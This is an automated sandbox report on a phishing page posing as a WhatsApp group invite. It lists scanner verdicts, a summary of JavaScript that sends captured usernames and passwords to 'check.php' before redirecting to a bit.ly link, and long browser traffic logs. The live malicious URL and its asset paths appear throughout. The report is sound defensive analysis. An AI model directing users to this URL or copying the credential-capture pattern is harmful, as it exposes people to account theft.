Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/

Overview

General Information

Sample URL:http://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/
Analysis ID:1448160
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious javascript
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 5772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5308 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2016,i,6664779081059254972,7231676484794704864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/Avira URL Cloud: detection malicious, Label: phishing
Source: http://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/SlashNext: detection malicious, Label: Fraudulent Website type: Phishing & Social Engineering
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/logowa.pngAvira URL Cloud: Label: phishing
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/fb-login.pngAvira URL Cloud: Label: phishing
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/01.jpgAvira URL Cloud: Label: phishing
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/maria.jpgAvira URL Cloud: Label: phishing
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/bahan1.jpgAvira URL Cloud: Label: phishing
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/jquery.min.jsAvira URL Cloud: Label: phishing

Phishing

barindex
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/LLM: Score: 8 Reasons: The JavaScript code captures user credentials (username and password) and sends them via an AJAX POST request to 'check.php'. This behavior is typical of phishing attacks, where user credentials are collected and sent to a malicious server. Additionally, the redirection to 'https://bit.ly/3PLZS43' after the credentials are sent is suspicious and indicative of a potential phishing attempt. DOM: 0.0.pages.csv
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/HTTP Parser: Number of links: 0
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/HTTP Parser: Title: Undangan Grup WhatsApp does not match URL
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/HTTP Parser: <input type="password" .../> found
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/HTTP Parser: No <meta name="author".. found
Source: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.4:63833 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.226
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.226
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/ HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://joinchat8g7135b.12trm.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://joinchat8g7135b.12trm.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/img/maria.jpg HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/img/bahan1.jpg HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/img/01.jpg HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/img/bahan1.jpg HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/ HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/img/fb-login.png HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/moment.js/2.13.0/moment.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://joinchat8g7135b.12trm.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /AlexHostX/protect/a64076479559076b6e31356a0fb6188d291204ce/watermark.css HTTP/1.1Host: rawcdn.githack.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://joinchat8g7135b.12trm.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/398893/15136779/4e765036-1639-11e6-9201-67e728e86f39.jpg HTTP/1.1Host: cloud.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://joinchat8g7135b.12trm.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /AlexHostX/all.asset/c529c239acac01cd8bc1a76f349f7c3caebba766/580b57fcd9996e24bc43c543.png HTTP/1.1Host: rawcdn.githack.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://joinchat8g7135b.12trm.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/img/jquery.min.js HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /AlexHostX/all.asset/38984972fb20a70d711e86ac3e6f19e60ea8adc3/AlexHostWA.ttf HTTP/1.1Host: rawcdn.githack.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://joinchat8g7135b.12trm.my.idsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://joinchat8g7135b.12trm.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/img/loading.gif HTTP/1.1Host: www.starratings.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://joinchat8g7135b.12trm.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/material-design-iconic-font/2.1.2/fonts/Material-Design-Iconic-Font.woff2?v=2.1.0 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://joinchat8g7135b.12trm.my.idsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /AlexHostX/all.asset/c529c239acac01cd8bc1a76f349f7c3caebba766/580b57fcd9996e24bc43c543.png HTTP/1.1Host: raw.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://joinchat8g7135b.12trm.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/img/maria.jpg HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/img/01.jpg HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/img/fb-login.png HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/398893/15136779/4e765036-1639-11e6-9201-67e728e86f39.jpg HTTP/1.1Host: cloud.githubusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/img/logowa.png HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/img/loading.gif HTTP/1.1Host: www.starratings.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vhsfhqpdhdsih6/img/logowa.png HTTP/1.1Host: joinchat8g7135b.12trm.my.idConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: joinchat8g7135b.12trm.my.id
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.starratings.com.au
Source: global trafficDNS traffic detected: DNS query: rawcdn.githack.com
Source: global trafficDNS traffic detected: DNS query: cloud.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownHTTP traffic detected: POST /report/v4?s=oUTLFvZiTMRAoK3Q93kizLBJ0hjl6jJKmwAUq%2ByJgtbCAC5MaNw%2BrPwdruGI22QcS0CFWdFYPpq3vlpyyniKdBb5IgK7XY3Bq2JL7ttD8hM0RFcCBZWo9Btb9hnLcuGWqiOI5ug%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 498Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 22:30:16 GMTContent-Length: 14Connection: closeX-GitHub-Request-Id: 2CA2:32755B:1C5AE1A:1DEE559:6655089BVia: 1.1 varnishX-Served-By: cache-hel1410033-HELX-Cache: MISSX-Cache-Hits: 0X-Timer: S1716848796.459330,VS0,VE144Vary: Authorization,Accept-Encoding,OriginCross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: c52ee8936842679537ed606df884e56690f892cdSource-Age: 0Cache-Control: max-age=60, publicX-Githack-Cache-Status: HITCF-Cache-Status: HITReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oUTLFvZiTMRAoK3Q93kizLBJ0hjl6jJKmwAUq%2ByJgtbCAC5MaNw%2BrPwdruGI22QcS0CFWdFYPpq3vlpyyniKdBb5IgK7XY3Bq2JL7ttD8hM0RFcCBZWo9Btb9hnLcuGWqiOI5ug%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a972ce2c9219f3-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 22:30:16 GMTContent-Length: 14Connection: closeX-GitHub-Request-Id: 44CE:1487FE:18D711:1A3038:665508CFVia: 1.1 varnishX-Served-By: cache-hel1410025-HELX-Cache: MISSX-Cache-Hits: 0X-Timer: S1716848847.372142,VS0,VE148Vary: Authorization,Accept-Encoding,OriginCross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: e8e1c8ec182d9c6a59e0f02c27c61ea52fa2e833Source-Age: 0Cache-Control: max-age=60, publicX-Githack-Cache-Status: HITCF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FstcbIjvSOp3VY5prUsSWydzdqZtuNYgA1wPIZrG7SdC61HAWu2sN4HpuEAOmYmMB2aRThIcTki8DER510lRMnfSsT8e4OdISuHhXZCkJhZpuuJB5a1EyBTIzRaUDGyOOJxlXpw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a972d0ffd243ff-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: E8D0:23DDAF:76EF29:87F364:66550978Accept-Ranges: bytesDate: Mon, 27 May 2024 22:30:16 GMTVia: 1.1 varnishX-Served-By: cache-nyc-kteb1890030-NYCX-Cache: MISSX-Cache-Hits: 0X-Timer: S1716849017.747903,VS0,VE28Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: dc59b705263bea00f4b2cb9decd9f3ac799cc5eeExpires: Mon, 27 May 2024 22:35:16 GMTSource-Age: 0
